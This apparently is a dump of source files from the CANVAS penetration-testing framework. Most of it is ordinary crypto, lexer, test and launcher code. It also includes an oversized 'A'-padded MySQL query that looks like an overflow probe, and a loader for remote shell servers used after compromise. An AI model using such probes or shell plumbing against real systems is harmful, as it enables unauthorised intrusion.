-------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Abstract class for AES.""" 3 | 4 | class AES: 5 | def __init__(self, key, mode, IV, implementation): 6 | if len(key) not in (16, 24, 32): 7 | raise AssertionError() 8 | if mode != 2: 9 | raise AssertionError() 10 | if len(IV) != 16: 11 | raise AssertionError() 12 | self.isBlockCipher = True 13 | self.block_size = 16 14 | self.implementation = implementation 15 | if len(key)==16: 16 | self.name = "aes128" 17 | elif len(key)==24: 18 | self.name = "aes192" 19 | elif len(key)==32: 20 | self.name = "aes256" 21 | else: 22 | print "Length of key not recognized: %s"%len(key) 23 | raise AssertionError() 24 | 25 | #CBC-Mode encryption, returns ciphertext 26 | #WARNING: *MAY* modify the input as well 27 | def encrypt(self, plaintext): 28 | assert(len(plaintext) % 16 == 0) 29 | 30 | #CBC-Mode decryption, returns plaintext 31 | #WARNING: *MAY* modify the input as well 32 | def decrypt(self, ciphertext): 33 | assert(len(ciphertext) % 16 == 0) 34 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/ppcscan.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """ 4 | ppcscan.py 5 | 6 | PPC lexer for CANVAS 7 | 8 | """ 9 | 10 | from riscscan import * 11 | 12 | branchcode=["lt", "eq", "gt", "so"] 13 | 14 | 15 | class ppclex(risclex): 16 | def __init__(self): 17 | self.literals = ("BRANCHCODE",) 18 | risclex.__init__(self, 'ppc') 19 | 20 | def t_ID(self,t): 21 | r'[.]?[a-zA-Z_]+[\w]*[-+.]?(?!\w)|[%]?[a-zA-Z]+[a-zA-Z0-9]*' 22 | if t.value in self.registers: 23 | t.type = "REGISTER" 24 | elif t.value in branchcode: 25 | t.type = "BRANCHCODE" 26 | elif t.value[0] == "." and t.value[1:] in self.tconsts: 27 | t.type = "TCONST" 28 | elif t.value in self.opcodes: 29 | t.type = self.reserved_dict.get(t.value, "OPCODE") 30 | elif t.value[0] == 'b' and t.value[-1] in "+-_" and t.value[:-1] in self.opcodes: 31 | # we have a predicted branch opcode 32 | t.type = self.reserved_dict.get(t.value[:-1], "OPCODE") 33 | else: 34 | t.type = self.reserved_dict.get(t.value, "ID") 35 | return t 36 | 37 | 38 | if __name__ == "__main__": 39 | testlexer('ppc') 40 | 41 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/pymsrpc/scripts/midl_format_pointer_flags.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | midl_format_pointer_flags.py 5 | 6 | This just makes a comment about the midl format string pointer flags. 7 | 8 | (c) 2007 Cody Pierce - See LICENSE.txt 9 | ''' 10 | 11 | # Format string pointer flags 12 | AllocateAllNodes = 0x01 13 | DontFree = 0x02 14 | AllocOnStack = 0x04 15 | SimplePointer = 0x08 16 | PointerDeref = 0x10 17 | 18 | def get_pointer_flags(chary): 19 | chary &= 0x000000ff 20 | 21 | comment = "Pointer Flags: " 22 | 23 | if (chary & AllocateAllNodes): comment += "allocate all nodes, " 24 | if (chary & DontFree): comment += "dont free, " 25 | if (chary & AllocOnStack): comment += "alloc on stack, " 26 | if (chary & SimplePointer): comment += "simple pointer, " 27 | if (chary & PointerDeref): comment += "pointer deref, " 28 | 29 | return comment.rstrip().rstrip(',') 30 | 31 | current_ea = ScreenEA() 32 | chary = Byte(current_ea) 33 | comment = get_pointer_flags(chary) 34 | 35 | if not MakeComm(current_ea, comment): 36 | print "[!] Problem creating comment @ %08x %s" % (current_ea, comment) -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/mysql_test.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import mysqllib 9 | 10 | def main(host): 11 | # we can call m.setDebug() if we want packet output 12 | # in case that my primitive library brakes 13 | m=mysqllib.MySQL() 14 | m.connect( (host, 3306)) 15 | m.authenticate("username", "password", "mysql") 16 | 17 | result=m.query("SELECT '" + "@"*400+ "A" * (7696)+"'") 18 | m.fetch_result(result) 19 | print m.fields 20 | print m.rows 21 | 22 | result=m.query("SELECT * from myclient_test") 23 | m.fetch_result(result) 24 | print m.fields 25 | print m.rows 26 | 27 | # INSERT with new stmt binding 28 | 29 | m.stmt_prepare("INSERT INTO test_bind_fetch VALUES(?,?,?,?,?,?,?)") 30 | m.stmt_bind([3,4,5,6,7,8,9]) 31 | print m.execute() 32 | if __name__ == '__main__': 33 | main("127.0.0.1") # <- nosense, but i want to look -in- 34 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/template/tests/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2006-2007 Edgewall Software 4 | # All rights reserved. 5 | # 6 | # This software is licensed as described in the file COPYING, which 7 | # you should have received as part of this distribution. The terms 8 | # are also available at http://genshi.edgewall.org/wiki/License. 9 | # 10 | # This software consists of voluntary contributions made by many 11 | # individuals. For the exact contribution history, see the revision 12 | # history and logs, available at http://genshi.edgewall.org/log/. 13 | 14 | import doctest 15 | import unittest 16 | 17 | def suite(): 18 | from genshi.template.tests import base, directives, eval, interpolation, \ 19 | loader, markup, plugin, text 20 | suite = unittest.TestSuite() 21 | suite.addTest(base.suite()) 22 | suite.addTest(directives.suite()) 23 | suite.addTest(eval.suite()) 24 | suite.addTest(interpolation.suite()) 25 | suite.addTest(loader.suite()) 26 | suite.addTest(markup.suite()) 27 | suite.addTest(plugin.suite()) 28 | suite.addTest(text.suite()) 29 | return suite 30 | 31 | if __name__ == '__main__': 32 | unittest.main(defaultTest='suite') 33 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/Python_RC4.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Pure-Python RC4 implementation.""" 3 | 4 | from RC4 import RC4 5 | from cryptomath import * 6 | 7 | def new(key,mode=None, iv=None): 8 | return Python_RC4(key) 9 | 10 | class Python_RC4(RC4): 11 | def __init__(self, key): 12 | RC4.__init__(self, key, "python") 13 | keyBytes = stringToBytes(key) 14 | S = [i for i in range(256)] 15 | j = 0 16 | for i in range(256): 17 | j = (j + S[i] + keyBytes[i % len(keyBytes)]) % 256 18 | S[i], S[j] = S[j], S[i] 19 | 20 | self.S = S 21 | self.i = 0 22 | self.j = 0 23 | 24 | def encrypt(self, plaintext): 25 | plaintextBytes = stringToBytes(plaintext) 26 | S = self.S 27 | i = self.i 28 | j = self.j 29 | for x in range(len(plaintextBytes)): 30 | i = (i + 1) % 256 31 | j = (j + S[i]) % 256 32 | S[i], S[j] = S[j], S[i] 33 | t = (S[i] + S[j]) % 256 34 | plaintextBytes[x] ^= S[t] 35 | self.i = i 36 | self.j = j 37 | return bytesToString(plaintextBytes) 38 | 39 | def decrypt(self, ciphertext): 40 | return self.encrypt(ciphertext) 41 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/tests/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2006 Edgewall Software 4 | # All rights reserved. 5 | # 6 | # This software is licensed as described in the file COPYING, which 7 | # you should have received as part of this distribution. The terms 8 | # are also available at http://genshi.edgewall.org/wiki/License. 9 | # 10 | # This software consists of voluntary contributions made by many 11 | # individuals. For the exact contribution history, see the revision 12 | # history and logs, available at http://genshi.edgewall.org/log/. 13 | 14 | import unittest 15 | 16 | def suite(): 17 | import genshi 18 | from genshi.tests import builder, core, input, output, path, util 19 | from genshi.filters import tests as filters 20 | from genshi.template import tests as template 21 | 22 | suite = unittest.TestSuite() 23 | suite.addTest(builder.suite()) 24 | suite.addTest(core.suite()) 25 | suite.addTest(filters.suite()) 26 | suite.addTest(input.suite()) 27 | suite.addTest(output.suite()) 28 | suite.addTest(path.suite()) 29 | suite.addTest(template.suite()) 30 | suite.addTest(util.suite()) 31 | return suite 32 | 33 | if __name__ == '__main__': 34 | unittest.main(defaultTest='suite') 35 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/runcanvas.sh: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | PYTHON=python 9 | 10 | if [ -z "$DISPLAY" ] ; then 11 | DISPLAY=:0.0 12 | export DISPLAY 13 | fi 14 | 15 | if [ -f /etc/debian-release ] ; then 16 | # XXX check if we are with a bugged kernel before to apply that fix 17 | export LD_ASSUME_KERNEL=2.4.1 18 | fi 19 | 20 | if [ -f /etc/gentoo-release ] ; then 21 | PYTHONPATH=/usr/lib/python2.4/site-packages 22 | export PYTHONPATH 23 | fi 24 | 25 | if [ -f /etc/release ] ; then # Solaris, hehe 26 | PATH=$PATH:/usr/sfw/bin 27 | export PATH # uh 28 | fi 29 | 30 | if [ ! -z "$SHELL" ] ; then 31 | BUSYBOX="$(which busybox)" 32 | if [ ! -z "$BUSYBOX" ] && [ -x "$BUSYBOX" ] && [ "$SHELL" -ef "$BUSYBOX" ] ; then 33 | if [ "$(uname -sm)" = "Linux armv5tejl" ] ; then 34 | PYTHON=/var/lib/install/usr/bin/python2.4 35 | LD_LIBRARY_PATH=/var/lib/install/usr/lib:$LD_LIBRARY_PATH 36 | export LD_LIBRARY_PATH 37 | fi 38 | fi 39 | fi 40 | 41 | $PYTHON runcanvas.py $* 42 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/server.cert: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDXDCCAsWgAwIBAgIJAJWfiatT/i7FMA0GCSqGSIb3DQEBBQUAMH0xCzAJBgNV 3 | BAYTAlNQMQ4wDAYDVQQIEwVTUElLRTEOMAwGA1UEBxMFU1BJS0UxDjAMBgNVBAoT 4 | BVNQSUtFMQ4wDAYDVQQLEwVTUElLRTEOMAwGA1UEAxMFU1BJS2UxHjAcBgkqhkiG 5 | 9w0BCQEWD1NQSUtFQFNQSUtFLmNvbTAeFw0wODAzMDQxNjI1MDRaFw0xODAzMDIx 6 | NjI1MDRaMH0xCzAJBgNVBAYTAlNQMQ4wDAYDVQQIEwVTUElLRTEOMAwGA1UEBxMF 7 | U1BJS0UxDjAMBgNVBAoTBVNQSUtFMQ4wDAYDVQQLEwVTUElLRTEOMAwGA1UEAxMF 8 | U1BJS2UxHjAcBgkqhkiG9w0BCQEWD1NQSUtFQFNQSUtFLmNvbTCBnzANBgkqhkiG 9 | 9w0BAQEFAAOBjQAwgYkCgYEA66yW0sU2uGK5a5CsRPgEQIT/Det9aZecxH3uuv3a 10 | UW+UqghjXlt+JeoiII1XGGsJS0jsiBpy9vULcGnVgQtjDsgMum8HnHVWTnc/Ew1P 11 | K8J3VUVP+57bNCgruiSRXOKQO6KabQBL5xXKptPb14ekrNoRrSa1yKs3sMG3Uhf3 12 | 97UCAwEAAaOB4zCB4DAdBgNVHQ4EFgQUkcYujTrdGz3E5nUKPlfD4pGX5GIwgbAG 13 | A1UdIwSBqDCBpYAUkcYujTrdGz3E5nUKPlfD4pGX5GKhgYGkfzB9MQswCQYDVQQG 14 | EwJTUDEOMAwGA1UECBMFU1BJS0UxDjAMBgNVBAcTBVNQSUtFMQ4wDAYDVQQKEwVT 15 | UElLRTEOMAwGA1UECxMFU1BJS0UxDjAMBgNVBAMTBVNQSUtlMR4wHAYJKoZIhvcN 16 | AQkBFg9TUElLRUBTUElLRS5jb22CCQCVn4mrU/4uxTAMBgNVHRMEBTADAQH/MA0G 17 | CSqGSIb3DQEBBQUAA4GBACWwMwc/4p4aAf5rWBp18Ax8E8ptNUG7Yx0q5LNy5W3U 18 | sPx9DhidG2WeANf5tgdyHovfO88O3HR8f9tncy0htIunz/d3D25TLel2Tvi0r5d2 19 | 2lNjCUHd3lwJzPMNb5Mm9yhXl16R7tjqPlQdHRdBG3m0Dg+mnNDNYd8OwbQNnyF6 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Cipher/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Secret-key encryption algorithms. 3 | 4 | Secret-key encryption algorithms transform plaintext in some way that 5 | is dependent on a key, producing ciphertext. This transformation can 6 | easily be reversed, if (and, hopefully, only if) one knows the key. 7 | 8 | The encryption modules here all support the interface described in PEP 9 | 272, "API for Block Encryption Algorithms". 10 | 11 | If you don't know which algorithm to choose, use AES because it's 12 | standard and has undergone a fair bit of examination. 13 | 14 | Crypto.Cipher.AES Advanced Encryption Standard 15 | Crypto.Cipher.ARC2 Alleged RC2 16 | Crypto.Cipher.ARC4 Alleged RC4 17 | Crypto.Cipher.Blowfish 18 | Crypto.Cipher.CAST 19 | Crypto.Cipher.DES The Data Encryption Standard. Very commonly used 20 | in the past, but today its 56-bit keys are too small. 21 | Crypto.Cipher.DES3 Triple DES. 22 | Crypto.Cipher.IDEA 23 | Crypto.Cipher.RC5 24 | Crypto.Cipher.XOR The simple XOR cipher. 25 | """ 26 | 27 | __all__ = ['AES', 'ARC2', 'ARC4', 28 | 'Blowfish', 'CAST', 'DES', 'DES3', 'IDEA', 'RC5', 29 | 'XOR' 30 | ] 31 | 32 | __revision__ = "$Id: __init__.py,v 1.2 2006/07/29 02:52:49 phil Exp $" 33 | 34 | 35 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """ 3 | TLS Lite is a free python library that implements SSL v3, TLS v1, and 4 | TLS v1.1. TLS Lite supports non-traditional authentication methods 5 | such as SRP, shared keys, and cryptoIDs, in addition to X.509 6 | certificates. TLS Lite is pure python, however it can access OpenSSL, 7 | cryptlib, pycrypto, and GMPY for faster crypto operations. TLS Lite 8 | integrates with httplib, xmlrpclib, poplib, imaplib, smtplib, 9 | SocketServer, asyncore, and Twisted. 10 | 11 | To use, do:: 12 | 13 | from tlslite.api import * 14 | 15 | Then use the L{tlslite.TLSConnection.TLSConnection} class with a socket, 16 | or use one of the integration classes in L{tlslite.integration}. 17 | 18 | @version: 0.3.8 19 | """ 20 | __version__ = "0.3.8" 21 | 22 | __all__ = ["api", 23 | "BaseDB", 24 | "Checker", 25 | "constants", 26 | "errors", 27 | "FileObject", 28 | "HandshakeSettings", 29 | "mathtls", 30 | "messages", 31 | "Session", 32 | "SessionCache", 33 | "SharedKeyDB", 34 | "TLSConnection", 35 | "TLSRecordLayer", 36 | "VerifierDB", 37 | "X509", 38 | "X509CertChain", 39 | "integration", 40 | "utils"] 41 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/osdetection/local.py: -------------------------------------------------------------------------------- 1 | import libs.canvasos as canvasos 2 | 3 | class localdetect: 4 | def __init__(self): 5 | return 6 | 7 | def run_localdetect(self): 8 | """ local node os detect logic """ 9 | 10 | self.log('Doing localhost OS detect') 11 | 12 | # if we have the win32 api .. we can just get the version .. 13 | result = None 14 | 15 | # XXX: ideally we split this out into an external file too .. 16 | if 'win32api' in self.node.capabilities: 17 | 18 | ret,value = self.node.shell.GetVersionEx() 19 | 20 | if ret: 21 | 22 | result = canvasos.new('Windows') 23 | 24 | if value['Major Version'] == 5 and value['Minor Version'] == 0: 25 | result.version = '2000' 26 | result.servicepack = value['SP string'] 27 | 28 | elif value['Major Version'] == 5 and value['Minor Version'] == 1: 29 | result.version = 'XP' 30 | result.servicepack = value['SP string'] 31 | 32 | elif value['Major Version'] == 5 and value['Minor Version'] == 2: 33 | result.version="2003" 34 | result.servicepack = value['SP string'] 35 | 36 | return result 37 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/FreeBSD.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from BSD import BSD43, BSD44, BSD44lite2 4 | 5 | class FreeBSD1(BSD43): 6 | 7 | def __init__(self): 8 | BSD43.__init__(self) 9 | 10 | 11 | class FreeBSD2(FreeBSD1, BSD44): 12 | 13 | def __init__(self): 14 | FreeBSD1.__init__(self) 15 | BSD44.__init__(self) 16 | 17 | 18 | class FreeBSD3(FreeBSD2, BSD44lite2): 19 | 20 | def __init__(self): 21 | FreeBSD2.__init__(self) 22 | BSD44lite2.__init__(self) 23 | 24 | 25 | class FreeBSD32(FreeBSD3): 26 | 27 | def __init__(self): 28 | FreeBSD3.__init__(self) 29 | 30 | 31 | class FreeBSD33(FreeBSD32): 32 | 33 | def __init__(self): 34 | FreeBSD32.__init__(self) 35 | 36 | 37 | class FreeBSD34(FreeBSD33): 38 | 39 | def __init__(self): 40 | FreeBSD33.__init__(self) 41 | 42 | 43 | class FreeBSD40(FreeBSD34): 44 | 45 | def __init__(self): 46 | FreeBSD34.__init__(self) 47 | 48 | 49 | class FreeBSD41(FreeBSD40): 50 | 51 | def __init__(self): 52 | FreeBSD40.__init__(self) 53 | 54 | 55 | class FreeBSD42(FreeBSD41): 56 | 57 | def __init__(self): 58 | FreeBSD41.__init__(self) 59 | 60 | 61 | class FreeBSD45(FreeBSD42): 62 | 63 | def __init__(self): 64 | FreeBSD42.__init__(self) 65 | 66 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/paramiko/compress.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2003-2007 Robey Pointer 2 | # 3 | # This file is part of paramiko. 4 | # 5 | # Paramiko is free software; you can redistribute it and/or modify it under the 6 | # terms of the GNU Lesser General Public License as published by the Free 7 | # Software Foundation; either version 2.1 of the License, or (at your option) 8 | # any later version. 9 | # 10 | # Paramiko is distrubuted in the hope that it will be useful, but WITHOUT ANY 11 | # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR 12 | # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more 13 | # details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with Paramiko; if not, write to the Free Software Foundation, Inc., 17 | # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. 18 | 19 | """ 20 | Compression implementations for a Transport. 21 | """ 22 | 23 | import zlib 24 | 25 | 26 | class ZlibCompressor (object): 27 | def __init__(self): 28 | self.z = zlib.compressobj(9) 29 | 30 | def __call__(self, data): 31 | return self.z.compress(data) + self.z.flush(zlib.Z_FULL_FLUSH) 32 | 33 | 34 | class ZlibDecompressor (object): 35 | def __init__(self): 36 | self.z = zlib.decompressobj() 37 | 38 | def __call__(self, data): 39 | return self.z.decompress(data) 40 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Plex/__init__.py: -------------------------------------------------------------------------------- 1 | #======================================================================= 2 | # 3 | # Python Lexical Analyser 4 | # 5 | #======================================================================= 6 | 7 | """ 8 | The Plex module provides lexical analysers with similar capabilities 9 | to GNU Flex. The following classes and functions are exported; 10 | see the attached docstrings for more information. 11 | 12 | Scanner For scanning a character stream under the 13 | direction of a Lexicon. 14 | 15 | Lexicon For constructing a lexical definition 16 | to be used by a Scanner. 17 | 18 | Str, Any, AnyBut, AnyChar, Seq, Alt, Opt, Rep, Rep1, 19 | Bol, Eol, Eof, Empty 20 | 21 | Regular expression constructors, for building pattern 22 | definitions for a Lexicon. 23 | 24 | State For defining scanner states when creating a 25 | Lexicon. 26 | 27 | TEXT, IGNORE, Begin 28 | 29 | Actions for associating with patterns when 30 | creating a Lexicon. 31 | """ 32 | 33 | from Actions import TEXT, IGNORE, Begin 34 | from Lexicons import Lexicon, State 35 | from Regexps import RE, Seq, Alt, Rep1, Empty, Str, Any, AnyBut, AnyChar, Range 36 | from Regexps import Opt, Rep, Bol, Eol, Eof, Case, NoCase 37 | from Scanners import Scanner 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/pysnmp/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 1999-2006, Ilya Etingof , all rights reserved. 2 | 3 | Redistribution and use in source and binary forms, with or without 4 | modification, are permitted provided that the following conditions are met: 5 | 6 | * Redistributions of source code must retain the above copyright notice, 7 | this list of conditions and the following disclaimer. 8 | 9 | * Redistributions in binary form must reproduce the above copyright notice, 10 | this list of conditions and the following disclaimer in the documentation 11 | and/or other materials provided with the distribution. 12 | 13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS'' 14 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 15 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 16 | DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY 17 | DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 20 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 22 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEFShellServer/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | from MSSgeneric import MSSgeneric 9 | 10 | MSS_compat_tbl = { 11 | 'Win32::x86': ["win32MosdefShellServer", "win32shellserver"], 12 | 'Solaris::sparc': ["solarisMosdefShellServer", "solarisshellserver"], 13 | # 'FreeBSD::i386': ["bsdMosdefShellserver", "bsdshellserver"], 14 | 'MacOSX::ppc': ["osxMosdefShellServer", "osxshellserver"], 15 | } 16 | 17 | def MosdefShellServer(os, proc, version = None): 18 | sysname = "%s::%s" % (os, proc) 19 | 20 | # old files 21 | if MSS_compat_tbl.has_key(sysname): 22 | mss = getattr(__import__(MSS_compat_tbl[sysname][0]), "old_" + MSS_compat_tbl[sysname][1]) 23 | # new way 24 | else: 25 | try: 26 | mss = getattr(__import__("MOSDEFShellServer." + os, globals(), locals(), ["MOSDEFShellServer"]), "%s_%s" % (os, proc)) 27 | except ImportError: 28 | raise AssertionError, "MosdefShellServer dunno about %s" % sysname 29 | except: # SyntaxError and so 30 | raise 31 | 32 | # we set a nice prompt here 33 | setattr(mss, 'prompt', os + "/MOSDEF") 34 | 35 | # old files 36 | return mss 37 | 38 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/internal/portability.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | import sys 4 | import traceback 5 | import warnings 6 | import debug 7 | 8 | def deprecate(message = None, file = sys.stderr): 9 | """ warn when a deprecated function is called """ 10 | 11 | if not debug.debug_enabled: 12 | pass 13 | 14 | tb = traceback.extract_stack() 15 | # stack is [?=main][...][caller][here=deprecated][extract_stack] 16 | 17 | if (len(tb) <= 2): # called by main? 18 | return 19 | 20 | if not message: 21 | message = "" 22 | (file, line, calling_func, deprecated_code) = tb[-3] 23 | #debug.devlog("!!! use of deprecated function %s in %s() [%s:%d] %s" % (f_deprecated, f_calling, file, line, message)) 24 | debug.devlog("DEPRECATED File %s, line %d, in %s()" % (file, line, calling_func)) 25 | debug.devlog("DEPRECATED -> %s" % message) 26 | debug.devlog("DEPRECATED code: %s" % deprecated_code) 27 | #warnings.warn(message, DeprecationWarning, stacklevel=3) 28 | 29 | def warnings_safely_ignore(category): 30 | warnings.filterwarnings('ignore', category=category) 31 | 32 | def warning_restore(): 33 | warnings.resetwarnings() 34 | 35 | def _test(): 36 | def popo(): 37 | deprecate("testing deprecate()") 38 | print "popo" 39 | 40 | def x(): 41 | print "x" 42 | popo() 43 | 44 | print "1" 45 | x() 46 | print "2" 47 | 48 | if __name__ == "__main__": 49 | _test() 50 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/osdetection/ssh.py: -------------------------------------------------------------------------------- 1 | import libs.canvasos as canvasos 2 | 3 | class sshdetect: 4 | def __init__(self): 5 | return 6 | 7 | def run_sshdetect(self): 8 | result = None 9 | 10 | banner = self.engine.getModuleExploit("telnetbanner") 11 | banner.link(self) 12 | banner.argsDict["port"] = 22 13 | banner.argsDict["nologin"] = True 14 | ret = banner.run() 15 | 16 | # Improved this to add support for more SSH fingerprinting 17 | if ret or banner.result: 18 | banner_result = banner.result 19 | 20 | ssh_strs = { "Sun_SSH":"Solaris", 21 | "osso":"Nokia N800 Tablet", 22 | "Tru64":"Tru64 UNIX", 23 | "ubuntu":"Ubuntu Linux", 24 | "Debian":"Debian Linux", 25 | "FreeBSD":"FreeBSD", 26 | "SSH-2.0-OpenSSH_4.4":"Linux" 27 | } 28 | 29 | for ssh_str in ssh_strs.keys(): 30 | if ssh_str in banner_result: 31 | result = canvasos.new(ssh_strs[ssh_str]) 32 | 33 | #little fingerprint from our server 34 | if "SSH-2.0-Sun_SSH_1.1" in banner_result: 35 | result.version = "10" 36 | 37 | self.log("SSH DETECT: Found %s on host %s" % (result, self.host)) 38 | 39 | return result 40 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/canvas.bat: -------------------------------------------------------------------------------- 1 | rem This is a little CANVAS loader. It tries both Python 2.4 and 2.5. 2 | rem Copyright Immunity, Inc. 3 | 4 | rem if running python22... 5 | rem YOU CANNOT USE -OO because that strips doc strings, and 6 | rem we need docstrings to do our MOSDEF compile! 7 | 8 | rem This weird command cd's to the current directory of the batch script 9 | pushd %~dp0 10 | 11 | @IF exist c:\Python24\python.exe GOTO p24 12 | rem else python 2.5: 13 | PATH=c:\GTK\bin;c:\Python25\DLLs;C:\python25\;c:\Program Files\Common Files\GTK\2.0\lib;%PATH% 14 | python.exe -W ignore runcanvas.py 15 | @exit 16 | 17 | 18 | 19 | :p24 20 | rem else python 2.4: 21 | PATH=c:\GTK\bin;c:\Python24\DLLs;c:\Program Files\Common Files\GTK\2.0\lib;c:\Python24\; %PATH% 22 | rem c:\python24\python.exe -W ignore runcanvas.py 23 | rem in case: 24 | python.exe -W ignore runcanvas.py 25 | @exit 26 | 27 | 28 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/yahoo/search/dom/term.py: -------------------------------------------------------------------------------- 1 | """DOM parser for Term Extraction search results 2 | 3 | Implement a simple DOM parser for the Yahoo Search Web Services 4 | term extraction search APIs. 5 | """ 6 | 7 | 8 | __revision__ = "$Id: term.py,v 1.1 2005/10/17 01:41:47 zwoop Exp $" 9 | __version__ = "$Revision: 1.1 $" 10 | __author__ = "Leif Hedstrom " 11 | __date__ = "Sat Oct 15 15:44:48 PDT 2005" 12 | 13 | from yahoo.search import dom 14 | 15 | 16 | # 17 | # News Search DOM parser 18 | # 19 | class TermExtraction(dom.DOMResultParser): 20 | """TermExtraction - DOM parser for Term Extraction queries 21 | 22 | Return the list of words and phrases related to the context and 23 | the optional query string. The results from this search are slightly 24 | different compared to other services, it's just a simple list of 25 | words and phrases. 26 | 27 | """ 28 | def _parse_result_set(self, result_set): 29 | """Internal method to parse one Result node""" 30 | cnt = 0 31 | for result in result_set.getElementsByTagName('Result'): 32 | cnt += 1 33 | self._results.append(self._get_text(result.childNodes)) 34 | 35 | self._total_results_available = cnt 36 | self._total_results_returned = cnt 37 | if cnt > 0: 38 | self._first_result_position = 1 39 | 40 | 41 | 42 | # 43 | # local variables: 44 | # mode: python 45 | # indent-tabs-mode: nil 46 | # py-indent-offset: 4 47 | # end: 48 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/test/test_rfc1751.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # 3 | # Test script for Crypto.Util.randpool. 4 | # 5 | 6 | __revision__ = "$Id: test_rfc1751.py,v 1.2 2006/07/29 02:52:51 phil Exp $" 7 | 8 | import binascii 9 | from sancho.unittest import TestScenario, parse_args, run_scenarios 10 | from Crypto.Util import RFC1751 11 | 12 | tested_modules = [ "Crypto.Util.RFC1751" ] 13 | 14 | test_data = [('EB33F77EE73D4053', 'TIDE ITCH SLOW REIN RULE MOT'), 15 | ('CCAC2AED591056BE4F90FD441C534766', 16 | 'RASH BUSH MILK LOOK BAD BRIM AVID GAFF BAIT ROT POD LOVE'), 17 | ('EFF81F9BFBC65350920CDD7416DE8009', 18 | 'TROD MUTE TAIL WARM CHAR KONG HAAG CITY BORE O TEAL AWL') 19 | ] 20 | 21 | class RFC1751Test (TestScenario): 22 | 23 | def setup (self): 24 | pass 25 | 26 | def shutdown (self): 27 | pass 28 | 29 | def check_k2e (self): 30 | "Check converting keys to English" 31 | for key, words in test_data: 32 | key=binascii.a2b_hex(key) 33 | self.test_val('RFC1751.key_to_english(key)', words) 34 | 35 | def check_e2k (self): 36 | "Check converting English strings to keys" 37 | for key, words in test_data: 38 | key=binascii.a2b_hex(key) 39 | self.test_val('RFC1751.english_to_key(words)', key) 40 | 41 | # class RFC1751Test 42 | 43 | 44 | if __name__ == "__main__": 45 | (scenarios, options) = parse_args() 46 | run_scenarios(scenarios, options) 47 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/exitthread/exitthread.py: -------------------------------------------------------------------------------- 1 | #! 